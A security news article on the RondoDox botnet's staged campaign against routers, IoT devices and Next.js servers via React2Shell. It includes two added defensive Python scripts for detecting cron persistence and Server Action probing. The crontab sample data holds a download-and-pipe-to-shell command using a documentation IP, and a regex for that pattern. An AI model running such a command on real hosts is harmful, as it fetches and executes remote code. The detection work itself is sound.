Wavlink routers and other IoT devices hit by React2Shell attacks


Security researchers say a botnet called RondoDox has spent nine straight months targeting Internet of Things (IoT) devices and web servers, hitting popular platforms like WordPress, Drupal, and Struts2, alongside consumer-grade IoT devices such as Wavlink routers.

A recent analysis by CloudSEK reveals that the campaign has escalated by exploiting React2Shell (CVE-2025-55182), a critical vulnerability in React Server Components and Next.js that enables unauthenticated attackers to execute code remotely.

RondoDox has previously abused older vulnerabilities, like CVE-2023-1389 and CVE-2025-24893, but later started exploiting the React2Shell vulnerability.

RondoDox first appeared in early 2025, but CloudSEK’s analysis suggests that the threat actors behind it didn’t rush to execute the attack. Instead, the campaign unfolded in carefully staged phases.

According to researchers, from March through April, attackers conducted reconnaissance and manual vulnerability scanning. By late spring, they shifted to daily mass probing, hitting popular platforms like WordPress, Drupal, and Struts2, alongside consumer-grade IoT devices such as Wavlink routers.

By July, the operation had fully industrialized. Automated deployment kicked in on an hourly basis, dramatically expanding the botnet’s reach.

The December attacks marked the most aggressive phase yet, with attackers actively scanning for exposed Next.js servers and dropping multiple payloads in rapid succession.

In attacks observed in December 2025, the threat actors reportedly scanned the internet for vulnerable Next.js servers before attempting to deploy a mix of cryptocurrency miners, botnet tooling, and a Mirai-based payload.

Killing the competition

One of RondoDox’s more notable traits is how aggressively it defends its turf. CloudSEK found that a component known as “/nuts/bolts” is designed to wipe out rival malware before installing the main bot.

It terminates competing coin miners, removes artifacts from previous attacks, and scrubs Docker-based payloads left behind by other threat actors.

The tool goes further by setting up persistence via /etc/crontab and continuously scanning running processes.

Every 45 seconds, it checks active executables and kills anything not on its whitelist, effectively preventing reinfection by competitors and turning compromised devices into single-tenant assets for the RondoDox operators.
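The behaviour described in this section (a persistence entry in /etc/crontab, a binary running from a scratch directory, a process loop that guards the host) leaves traces a defender can look for. The script below is an added example, not code from CloudSEK or from the article: it scans a crontab text and a `ps`-style process listing for those traces. The "/nuts/bolts" string is the only indicator taken from the page and is treated as a plain substring; the directory list, the interval threshold, the download-and-pipe pattern and both sample inputs are constructed assumptions.

```python
"""Host checks for RondoDox-style persistence and process control (added example)."""
import re
from typing import Dict, List, Optional

# Directories a legitimate cron job or daemon rarely executes from (assumption).
SUSPICIOUS_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
# Component name reported by CloudSEK; matched as a substring of the command line.
KNOWN_NAMES = ("/nuts/bolts",)
# Cron entries firing more often than this many minutes are flagged (assumption).
MIN_INTERVAL_MINUTES = 5


def cron_interval_minutes(minute_field: str) -> Optional[int]:
    """Return the interval implied by a crontab minute field, or None if not periodic."""
    m = re.fullmatch(r"\*/(\d+)", minute_field)
    if m:
        return int(m.group(1))
    if minute_field == "*":
        return 1
    return None


def scan_crontab(text: str) -> List[Dict]:
    """Flag /etc/crontab lines (5 time fields + user + command) that look like malware persistence."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue
        minute, command = fields[0], fields[6]
        reasons = []
        interval = cron_interval_minutes(minute)
        if interval is not None and interval < MIN_INTERVAL_MINUTES:
            reasons.append(f"runs every {interval} min")
        if any(d in command for d in SUSPICIOUS_DIRS):
            reasons.append("executes from a temp directory")
        if re.search(r"(curl|wget)\b.*\|\s*(sh|bash)", command):
            reasons.append("downloads and pipes into a shell")
        if any(n in command for n in KNOWN_NAMES):
            reasons.append("references a known RondoDox component name")
        if reasons:
            findings.append({"line": lineno, "command": command, "reasons": reasons})
    return findings


def scan_processes(ps_output: str) -> List[Dict]:
    """Flag processes from `ps -eo pid,user,args` output (header line included)."""
    findings = []
    for raw in ps_output.splitlines()[1:]:
        parts = raw.split(None, 2)
        if len(parts) < 3:
            continue
        pid, user, cmd = parts
        reasons = []
        if any(d in cmd for d in SUSPICIOUS_DIRS):
            reasons.append("binary lives in a temp directory")
        if any(n in cmd for n in KNOWN_NAMES):
            reasons.append("matches a known RondoDox component name")
        if reasons:
            findings.append({"pid": int(pid), "user": user, "command": cmd, "reasons": reasons})
    return findings


# Constructed sample inputs; 203.0.113.10 is a documentation address, not a real C2.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/1 *   * * *   root    /tmp/nuts/bolts >/dev/null 2>&1
0 3     * * *   root    curl -s http://203.0.113.10/i.sh | sh
"""

SAMPLE_PS = """\
    PID USER     COMMAND
      1 root     /sbin/init
    842 root     /usr/sbin/cron -f
   1337 root     /tmp/nuts/bolts
   1401 nobody   /dev/shm/.m/miner -o pool.example:3333
"""

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"crontab line {f['line']}: {', '.join(f['reasons'])} :: {f['command']}")
    for p in scan_processes(SAMPLE_PS):
        print(f"pid {p['pid']} ({p['user']}): {', '.join(p['reasons'])} :: {p['command']}")
```

On a real host, feed `open("/etc/crontab").read()` and the output of `ps -eo pid,user,args` into the two functions; the per-user crontabs under /var/spool/cron and the /etc/cron.d directory are worth scanning with the same rules.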

Many internet-facing devices are at risk

According to the researchers, the impact of the campaign is severe. Organizations with internet-facing routers, IP cameras, and other network appliances are at risk as they are constantly targeted by automated and persistent attacks.

These devices could be potentially absorbed into botnets or misused for denial-of-service attacks and cryptocurrency mining.

At the application layer, enterprises running vulnerable Next.js Server Actions face the possibility of full server compromise through actively exploited deserialization flaws.

Researchers note that attackers often chain these weaknesses together, using compromised web applications such as WordPress, Drupal, Struts2, or WebLogic as an initial entry point before harvesting credentials and moving laterally into IoT and network infrastructure.

The risk is amplified by the botnet’s ability to deploy across multiple hardware architectures, allowing it to operate in cloud environments, edge devices, and embedded systems alike.

To reduce exposure, organizations should promptly upgrade to patched versions of Next.js, isolate IoT devices within dedicated VLANs, deploy web application firewalls, closely monitor systems for unusual process activity, and block known command-and-control infrastructure.

Attackers actively exploit React2Shell

The React2Shell server-side vulnerability has been actively exploited by threat actors since its disclosure. It carries the maximum CVSS score of 10.0 and enables external attackers to run privileged, arbitrary code on servers without authorization.

While the React team urged updates, researchers identified 150,000 exploit attempts a day, many involving direct command injection.

Smart home telemetry gathered over the past month by Bitdefender researchers shows just how aggressively the vulnerability is being exploited in the wild.

Attackers mainly targeted smart home appliances and consumer electronics. A significant amount of React2Shell traffic originated from a single datacenter in Poland, with one IP address alone responsible for over 12,000 exploit events.
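The volumes reported here (tens of thousands of attempts a day, a single address responsible for over 12,000 events) are what makes source-rate alerting practical. The script below is an added example, not code from Bitdefender, the React team or the article. It assumes a reverse proxy that logs one JSON object per request with the fields used in the code; the sample lines, the window length and the threshold are constructed. It counts POST requests carrying a `Next-Action` header, which is how Next.js invokes Server Actions, and alerts on any source address that sends more of them in a sliding window than a legitimate client plausibly would.

```python
"""Sliding-window detection of mass probing of Next.js Server Action endpoints (added example)."""
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone
from typing import Dict, Iterable, List

WINDOW_SECONDS = 60           # sliding window length (assumption)
MAX_ACTIONS_PER_WINDOW = 20   # Server Action POSTs per source IP per window before alerting (assumption)


def parse_line(line: str) -> dict:
    """Parse one JSON log record; timestamps are ISO 8601 (a trailing Z is accepted)."""
    rec = json.loads(line)
    rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
    return rec


def is_server_action(rec: dict) -> bool:
    """Next.js sends Server Action invocations as POSTs with a Next-Action header."""
    headers = {k.lower(): v for k, v in rec.get("headers", {}).items()}
    return rec.get("method") == "POST" and "next-action" in headers


def detect_probing(lines: Iterable[str]) -> Dict[str, dict]:
    """Return {src_ip: {"first_alert": datetime, "peak": int}} for IPs over the threshold."""
    windows = defaultdict(deque)   # per-IP timestamps of recent Server Action POSTs
    alerts: Dict[str, dict] = {}
    for line in lines:
        rec = parse_line(line)
        if not is_server_action(rec):
            continue
        ip = rec["src_ip"]
        q = windows[ip]
        q.append(rec["ts"])
        cutoff = rec["ts"] - timedelta(seconds=WINDOW_SECONDS)
        while q and q[0] < cutoff:
            q.popleft()            # drop events that fell out of the window
        if len(q) > MAX_ACTIONS_PER_WINDOW:
            a = alerts.setdefault(ip, {"first_alert": rec["ts"], "peak": 0})
            a["peak"] = max(a["peak"], len(q))
    return alerts


def constructed_sample_log() -> List[str]:
    """Constructed records: one noisy scanner, one normal user, one unrelated GET."""
    base = datetime(2025, 12, 20, 10, 0, 0, tzinfo=timezone.utc)

    def rec(offset: int, ip: str, method: str, headers: dict, status: int) -> str:
        return json.dumps({
            "ts": (base + timedelta(seconds=offset)).isoformat(),
            "src_ip": ip, "method": method, "path": "/", "headers": headers, "status": status,
        })

    lines = [rec(i, "198.51.100.7", "POST", {"Next-Action": "ACTION-ID-PLACEHOLDER"}, 500)
             for i in range(30)]                                  # 30 POSTs in 30 seconds
    lines += [rec(5 * i, "192.0.2.5", "POST", {"Next-Action": "ACTION-ID-PLACEHOLDER"}, 200)
              for i in range(3)]                                  # a real user clicking around
    lines.append(rec(12, "192.0.2.9", "GET", {"User-Agent": "curl/8.0"}, 200))
    return lines


if __name__ == "__main__":
    for ip, info in detect_probing(constructed_sample_log()).items():
        print(f"{ip}: first alert {info['first_alert'].isoformat()}, peak {info['peak']} in {WINDOW_SECONDS}s")
```

The alert carries the first timestamp at which the address crossed the threshold and the peak count, which is enough to drive a WAF or firewall block rule and to size the window for your own traffic; a site with heavy legitimate Server Action use needs a higher threshold than the constructed one here.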

Additional probing originated from the US, the Netherlands, Ireland, France, Hong Kong, Singapore, China, Panama, and numerous other regions.

AWS security teams report that they observed active exploitation attempts by multiple China state-nexus threat groups, including Earth Lamia and Jackpot Panda, within hours of disclosure.

As of December 31st, the Shadowserver Foundation, a non-profit organization that monitors exposed systems and vulnerabilities, had detected around 88,700 systems still vulnerable to React2Shell, most of them in the US.
